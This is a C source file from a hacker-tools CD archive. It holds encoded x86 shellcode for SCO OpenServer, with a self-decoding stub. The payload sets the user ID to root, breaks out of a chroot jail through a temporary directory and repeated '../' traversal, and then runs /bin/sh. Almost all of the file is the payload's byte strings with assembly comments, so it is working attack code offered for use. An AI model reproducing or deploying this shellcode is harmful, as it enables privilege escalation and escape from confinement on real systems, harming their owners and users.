home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / openserver / chroot_break.c next >
Encoding:
Text File  |  2000-10-17  |  2.1 KB  |  87 lines
  1. /*
  2.  *  Sco chroot() shellcode by doble@iname.com
  3.  *
  4.  *  - setreuid(0); 
  5.  *  - chroot-break (make a temp dir with mkdir(),
  6.  *    chroot() to tempdir, do a number of ../
  7.  *  - execve of /bin/sh
  8.  *
  9.  */
  10.  
  11. char shellcode[]=
  12.   "\x90\x90\x90\x90\x90"
  13.   "\x31\xdb"                // xorl %ebx,%ebx
  14.   "\x31\xc9"                // xorl %ecx,%ecx
  15.  
  16. // decode
  17.  
  18.   "\xeb\x12"                // jmp A
  19.   "\x5e"                    // B: popl %esi
  20.   "\xbf\x10\x10\x10\x10"        // movl 0x10101010,%edi
  21.   "\xb1\x21"                // movb 33,%cl
  22.   "\x29\x7e\x01"                // subl %edi,01(%esi)
  23.   "\x83\xc6\x04"                // addl 4,%esi
  24.   "\xe2\xf8"                // loop
  25.   "\xeb\x05"                // jmp +5
  26.   "\xe8\xe9\xff\xff\xff"        // A: call B
  27.   "\x90"
  28.   "\xfb\x5d"                // start: jmp uno 
  29.   "\x6e"                    // dos: popl %esi
  30.  
  31. // setuid(0)
  32.  
  33.   "\x41\xd0"                // xorl %eax,%eax
  34.   "\xc0\x27"                // movb $0x17,%al
  35.   "\x63"                    // pushl %ebx
  36.   "\x63"
  37.   "\xaa\x10\x10\x10\x10\x17\x10"
  38.  
  39. // mkdir("sh")
  40.  
  41.   "\x41\xd0"                // xorl %eax,%eax
  42.   "\xc0\x60"                // movb $0x50,%al
  43.   "\x9d\x8e\x15"                // leal 5(%esi),%edi
  44.   "\x67"                    // pushl %edi
  45.   "\x67"
  46.   "\xaa\x10\x10\x10\x10\x17\x10"
  47.  
  48. // chroot("sh")
  49.  
  50.   "\x41\xd0"                // xorl %eax,%eax
  51.   "\xc0\x4d"                // movb $03d,%al
  52.   "\x9d\x8e\x15"                // leal 5(%esi),%edi
  53.   "\x67"                    // pushl %edi
  54.   "\x67"
  55.   "\xaa\x10\x10\x10\x10\x17\x10"
  56.  
  57. // chroot("../../../../../../../../../../../../");
  58.  
  59.   "\x41\xd0"                // xorl %eax,%eax
  60.   "\xc0\x4d"                // movb $0x3d,%al
  61.   "\x9d\x8e\x18"                // leal 8(%esi),%edi
  62.   "\x67"                    // pushl %edi
  63.   "\x67"
  64.   "\xaa\x10\x10\x10\x10\x17\x10"
  65.  
  66. // execve("/bin/sh",0,0);
  67.  
  68.   "\x41\xd0"                // xorl %eax,%eax
  69.   "\xc0\x4b"                // movb $0x3b,%al
  70.   "\x63"                    // pushl %ebx
  71.   "\x63"                    // pushl %ebx 
  72.   "\x66"                    // pushl %esi
  73.   "\x66"                    // pushl %esi
  74.   "\xaa\x10\x10\x10\x10\x17\x10"    // lcall 0x7,0x0
  75.  
  76.   "\xf8\xbe\x0f\x10\x10"        // uno: call dos
  77.  
  78. // strings
  79.  
  80.   "\x3f\x72\x79\x7e\x3f"         // "/bin/" // 0(%esi)
  81.   "\x83\x78\x10" // "sh\x10"  // 5(%esi)
  82.   "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f"
  83.   "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f"
  84.   "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f"
  85.   "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f\x10" 
  86.   // "../../../../../../../../../../../../\x10"    // 8(%esi)
  87. ""; //